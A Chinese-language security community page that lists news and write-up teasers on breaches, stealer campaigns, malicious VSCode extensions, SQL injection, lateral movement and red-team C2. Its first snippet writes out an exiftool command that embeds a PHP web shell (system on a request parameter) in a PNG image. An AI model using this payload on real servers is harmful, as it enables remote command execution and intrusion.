暂无搜索历史
使用exiftool -Comment='<?php system($_REQUEST['cmd']); ?>' 1.png 生成一个图片马,图片在网上下一个....
艾迪亚实验室(IdeaLab)正通知受去年 10 月数据泄露事件影响的个人,当时黑客获取了敏感信息。
一个代号为 UNC5142、以经济利益为驱动的威胁行为体,被发现滥用区块链智能合约分发信息窃取器,包括 Atomic(AMOS)、Lumma、Rhadamant...
文章来自作者日常积累,未经许可严禁转载,转载需联系本人。文中内容仅限学习交流,严禁用于商业及非法用途,涉及网络安全相关未经授权不得测试,违规使用后果自负,与作者...
上个月影响到 OpenVSX 和 Visual Studio Code 市场的 GlassWorm 恶意软件活动,现在通过三个新的 VSCode 扩展重现,这些...
Google Cloud 发布最新网络安全预测报告《Cybersecurity Forecast 2026》,内容根据 2025 年的网络安全情势,提出以数据驱...
作者:比尔·图拉斯(Bill Toulas) 日期:2025 年 11 月 9 日 上午 10:11
本文讲解针对某个网络设备的漏洞挖掘,如何从黑盒测试到权限获取,从哪些角度对二进制文件进行分析获取更大的权限
打开py文件,发现样本包含了很长一段的payload,经过多层解压后通过exec来执行代码。exec是恶意样本常用的命令,典型搭配是先用compile将字节串/...
最近整理了几个edu系统的漏洞案例,也不能说有意思吧,反正都是大部分会遇到的类型,edu系统一直是个很好的练手场景,系统多、类型丰富,也经常能碰到一些意想不到的...
在授权测试某 APP 时,发现一处未授权 sql 注入,但是存在 waf,于是开始了绕 waf 之旅。
在红蓝对抗中,C2(Command & Control)服务器是红队的 “神经中枢”—— 其稳定性决定行动能否持续,隐蔽性决定能否避开蓝队溯源。多数红队行动暴露...
记录近期渗透项目及护网攻防利用JS泄露突破后台案例,Nday扫的没有大佬快,0day没有大佬储备多,何不研究一下前后端分离网站下渗透突破思路呢,文章为笔记复制故...
感觉整个渗透过程特别有意思,从扫描到 heapdump 泄露,到得敏感信息的泄露,再到观察请求包,思考参数表达的意思,为什么是这样的,从而发现隐藏的表达式注入点...
两个月前看qax情报中心通报了2.10.9的漏洞,然后顺手挖了下,然后包送给官方,最后成功水到了cve。
当我看到前端没任何功能点时,是绝望的;看到登录到系统后端只调用了两个接口时,是绝望的;看到js中一堆接口,但大多数都是403时,是绝望的;找到一个能调通的接口,...
在内网渗透中,域内横向移动是一种常见的攻击手法。攻击者会利用此技术,以被攻陷的系统为跳板,访问域内其他主机,扩大资产(包括跳板机中的文档和存储的凭证,以及通过跳...
最近挖到的中高危漏洞,既没靠 `0day` 这种 "王炸",也没搞复杂利用链 "炫技",纯靠瞪大眼睛当 "人肉扫描器",连标点符号都不放过地逐行比对参数和响应。...
暂未填写个人网址
